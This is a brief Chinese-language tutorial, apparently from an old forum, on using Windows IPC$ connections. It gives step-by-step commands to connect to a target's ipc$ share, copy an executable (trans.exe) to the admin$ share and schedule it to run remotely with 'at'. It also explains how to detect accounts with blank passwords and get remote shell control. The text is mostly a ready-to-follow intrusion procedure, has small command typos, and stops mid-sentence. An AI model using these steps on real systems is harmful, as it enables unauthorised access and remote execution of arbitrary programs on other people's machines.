怎么打开IPC空连接？

确定目标地址，假如目标为：0.0.0.1，用户名为：test123，密码为：password
要传送的文件是位于D盘的trans.exe。

1、依次单击“开始”—“运行”—输入：cmd—“确定”。

2、进入cmd shell后，输入指令：net use \\0.0.0.1\ipc$*"password"/user:test123 （回车键确定执行）

3、如果提示"命令成功完成"，则继续输入指令：copy d:trans.exe \\0.0.0.1\admin$

4、如果提示"已经复制 1 个文件”，则继续输入：net time \\0.0.0.1

5、假如显示"2008年1月1日 下午 3:15 命令成功完成"，则继续输入：at \\0.0.0.1 15:16 trans.exe

6、如果提示"已经增加 1 个任务"，就证明在2008年1月1日下午3点16分在0.0.0.1的机器上执行trans.exe。

7、如果执行完毕，关闭对0.0.0.1的IPC连接，则指令为：net use \0.0.0.1\admin$ /del

PS：如果第一步net use那个命令执行不成功，则证明0.0.0.1机器的139/tcp端口和445/tcp端口没有开启。（及Windows共享）

PS2：其实net use \\0.0.0.1\ipc$*""/user:test123，之间的密码可以不用写，如果不写依然连接成功得到0.0.0.1的cmd shell控制
端，就证明0.0.0.1的test123用户没有密码。

PS3：cmd shell是一种shell程序，shell在计算机项目里的意思是“控制”，也就是说，一个计算机的shell，可以以
输入命令行或者指令的情况下对整个计算机进行